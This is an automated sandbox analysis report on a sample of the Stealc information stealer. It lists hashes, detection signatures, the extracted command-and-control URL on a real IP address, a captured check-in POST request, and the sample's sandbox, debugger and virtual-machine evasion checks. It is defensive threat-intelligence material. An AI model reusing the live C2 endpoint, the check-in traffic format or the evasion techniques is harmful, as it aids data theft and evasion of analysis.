Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1525663
MD5:	1840b3a6769699f03fca969af6b4e883
SHA1:	53eeeb33aec86d2f03dc021351ffb61c1118aadd
SHA256:	247b59e9bb5df7c640981d51f2df6fd618414f802f3ce049c6fb469cf8a3a66d
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.e0000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_000EC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_000E7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_000E9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_000E9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_000F8EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_000F38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000F4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_000EDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_000EE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_000EED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_000F4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000EDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_000EBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_000F3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000EF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000E16D0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 42 44 43 44 38 41 33 44 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"53BDCD8A3D9D1524750037------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000E4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_000E4880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 42 44 43 44 38 41 33 44 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"53BDCD8A3D9D1524750037------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--

Source: file.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001253000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001253000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7b0923665da6f1
Source: file.exe, 00000000.00000002.1729629409.0000000001289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpHRPb
Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37v

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848	0_2_00412848
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B1170	0_2_004B1170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0046C9C4	0_2_0046C9C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B6380	0_2_004B6380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041738D	0_2_0041738D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B2C63	0_2_004B2C63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004A74C6	0_2_004A74C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004AA4BD	0_2_004AA4BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0049C563	0_2_0049C563
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004BCD23	0_2_004BCD23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0057F5D6	0_2_0057F5D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B7E77	0_2_004B7E77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004AF68D	0_2_004AF68D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003E7EDF	0_2_003E7EDF

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 000E45C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: zlzhjqsn ZLIB complexity 0.9950953584558824

Source: file.exe, 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1688759783.0000000005130000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_000F9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_000F3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UX9THANN.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1897472 > 1048576

Source: file.exe

Static PE information: Raw size of zlzhjqsn is bigger than: 0x100000 < 0x1a9000

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;zlzhjqsn:EW;kjlhrbah:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;zlzhjqsn:EW;kjlhrbah:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000F9860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1db9bd should be: 0x1d5331

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: zlzhjqsn
Source: file.exe	Static PE information: section name: kjlhrbah
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push ebx; mov dword ptr [esp], 49B1D488h	0_2_0041285E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push 5F9963D8h; mov dword ptr [esp], esi	0_2_004128C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push edi; mov dword ptr [esp], ecx	0_2_004129C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push 68C06886h; mov dword ptr [esp], edx	0_2_004129CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push 0FDF1D17h; mov dword ptr [esp], edi	0_2_00412A83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push edi; mov dword ptr [esp], 48F34100h	0_2_00412A88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push eax; mov dword ptr [esp], esi	0_2_00412AB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C053 push 3F0CDF26h; mov dword ptr [esp], ebx	0_2_0079C100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C053 push esi; mov dword ptr [esp], 2199DFF4h	0_2_0079C11F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C053 push ecx; mov dword ptr [esp], 60A9E047h	0_2_0079C131
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C053 push 70E9487Ah; mov dword ptr [esp], ecx	0_2_0079C160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C0861 push edx; mov dword ptr [esp], eax	0_2_004C0865
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000FB035 push ecx; ret	0_2_000FB048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00521818 push ebx; mov dword ptr [esp], eax	0_2_00521826
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C01B push ecx; mov dword ptr [esp], 4FA3DA43h	0_2_0079C035
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C01B push 3F0CDF26h; mov dword ptr [esp], ebx	0_2_0079C100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C01B push esi; mov dword ptr [esp], 2199DFF4h	0_2_0079C11F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C01B push ecx; mov dword ptr [esp], 60A9E047h	0_2_0079C131
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C01B push 70E9487Ah; mov dword ptr [esp], ecx	0_2_0079C160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0059903C push eax; mov dword ptr [esp], esp	0_2_00599080
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0055B0DD push eax; mov dword ptr [esp], ecx	0_2_0055B130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004D10D9 push eax; mov dword ptr [esp], ebx	0_2_004D3704
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0057F0EC push edx; mov dword ptr [esp], ebx	0_2_0057F120
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0057F0EC push ecx; mov dword ptr [esp], esi	0_2_0057F171
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF896 push edx; mov dword ptr [esp], 1A5D505Dh	0_2_005CF92A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF896 push edx; mov dword ptr [esp], 6EF0AF82h	0_2_005CF98C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF896 push 238F0BC2h; mov dword ptr [esp], edi	0_2_005CFA43
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D28D6 push ebp; mov dword ptr [esp], ecx	0_2_003D28FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00344938 push 653564A0h; mov dword ptr [esp], eax	0_2_0034935F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0056A174 push ebp; mov dword ptr [esp], ecx	0_2_0056A194
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0059296B push 43ABD101h; mov dword ptr [esp], eax	0_2_005929A9

Source: file.exe

Static PE information: section name: zlzhjqsn entropy: 7.955253982546698

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_000F9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 342155 second address: 342169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jnp 00007F8B150D74F0h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 342169 second address: 341A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 cmc 0x00000007 push dword ptr [ebp+122D0421h] 0x0000000d mov dword ptr [ebp+122D1C3Eh], esi 0x00000013 call dword ptr [ebp+122D1BC1h] 0x00000019 pushad 0x0000001a xor dword ptr [ebp+122D218Ch], ecx 0x00000020 xor eax, eax 0x00000022 jnl 00007F8B146BCD65h 0x00000028 mov edx, dword ptr [esp+28h] 0x0000002c sub dword ptr [ebp+122D218Ch], edi 0x00000032 mov dword ptr [ebp+122D2B01h], eax 0x00000038 jns 00007F8B146BCD5Fh 0x0000003e pushad 0x0000003f cld 0x00000040 je 00007F8B146BCD56h 0x00000046 popad 0x00000047 mov esi, 0000003Ch 0x0000004c sub dword ptr [ebp+122D218Ch], edi 0x00000052 sub dword ptr [ebp+122D218Ch], esi 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c add dword ptr [ebp+122D218Ch], ebx 0x00000062 lodsw 0x00000064 jnp 00007F8B146BCD5Ch 0x0000006a mov dword ptr [ebp+122D19ADh], ebx 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 jne 00007F8B146BCD5Ch 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e sub dword ptr [ebp+122D218Ch], ebx 0x00000084 pushad 0x00000085 add dword ptr [ebp+122D19ADh], edx 0x0000008b add edx, 33F31554h 0x00000091 popad 0x00000092 push eax 0x00000093 push eax 0x00000094 push edx 0x00000095 pushad 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 341A0B second address: 341A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 341A11 second address: 341A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE301 second address: 4BE30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F8B150D74E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE30E second address: 4BE312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2C7B second address: 4C2C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F8B150D74E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2C89 second address: 4C2C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
